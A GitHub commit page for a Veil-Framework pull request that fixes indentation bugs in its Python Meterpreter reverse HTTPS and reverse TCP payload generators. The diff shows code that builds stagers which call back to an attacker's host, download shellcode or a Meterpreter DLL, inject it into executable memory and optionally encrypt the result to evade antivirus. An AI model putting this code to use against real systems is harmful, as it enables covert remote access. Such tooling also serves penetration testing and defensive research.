Merge pull request Veil-Framework#41 from Veil-Framework/fixhttps

Fix formatting issue along with bug in rev_https
cyberxml · Apr 4, 2017 · a9bac7e · a9bac7e
2 parents 53a4fdb + edf9c40
commit a9bac7e
Show file tree

Hide file tree

Showing 3 changed files with 11 additions and 7 deletions.
diff --git a/CHANGELOG b/CHANGELOG
@@ -1,3 +1,7 @@
+[04.04.2017]
+     Released.: 3.0.1
+     Modified.: Python rev_https and rev_tcp modified to fix a small bug and formatting issue
+
 [03.07.2017]
      Released.: 3.0
      Modified.: This is Veil 3.0's initial release (with minor bug patches post-release). Ideally everything is working well! All mods (hopefully) will be tracked in this file so you know of any changes.
diff --git a/Tools/Evasion/payloads/python/meterpreter/rev_https.py b/Tools/Evasion/payloads/python/meterpreter/rev_https.py
@@ -99,7 +99,7 @@ def generate(self):
         payload_code +=  '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
         payload_code +=  '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
         payload_code +=  '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n"
-        payload_code +=  '\t' * num_tabs_required + '\t' * num_tabs_required + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
+        payload_code +=  '\t' * num_tabs_required + '\t' + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
         payload_code +=  '\t' * num_tabs_required + "\ttry:\n"
         payload_code +=  '\t' * num_tabs_required + "\t\t%s = urllib.request.urlopen(%s)\n" %(tName, requestName)
         payload_code +=  '\t' * num_tabs_required + "\t\ttry:\n"
@@ -112,7 +112,7 @@ def generate(self):
         payload_code +=  '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName, dataName)
         payload_code +=  '\t' * num_tabs_required + "\tif %s != \"\":\n" %(dataName)
         payload_code +=  '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
-        
+
         if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
             payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
             payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
@@ -132,9 +132,9 @@ def generate(self):
             payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
 
         # download the metpreter .dll and inject it
-        payload_code += "%s = ''\n" %(data2Name)
-        payload_code += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
-        payload_code += "%s(%s)\n" %(injectMethodName, data2Name)
+        payload_code += '\t' * num_tabs_required + "%s = ''\n" %(data2Name)
+        payload_code += '\t' * num_tabs_required + "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
+        payload_code += '\t' * num_tabs_required + "%s(%s)\n" %(injectMethodName, data2Name)
 
         if self.required_options["USE_PYHERION"][0].lower() == "y":
             payload_code = encryption.pyherion(payload_code)

diff --git a/Tools/Evasion/payloads/python/meterpreter/rev_tcp.py b/Tools/Evasion/payloads/python/meterpreter/rev_tcp.py
@@ -130,9 +130,9 @@ def generate(self):
             payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
 
         # download the stager
-        payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
+        payload_code += '\t' * num_tabs_required + "%s = %s()\n" %(shellCodeName, getDataMethodName)
         # inject what we grabbed
-        payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName)
+        payload_code += '\t' * num_tabs_required + "%s(%s)\n" % (injectMethodName, shellCodeName)
 
         if self.required_options["USE_PYHERION"][0].lower() == "y":
             payload_code = encryption.pyherion(payload_code)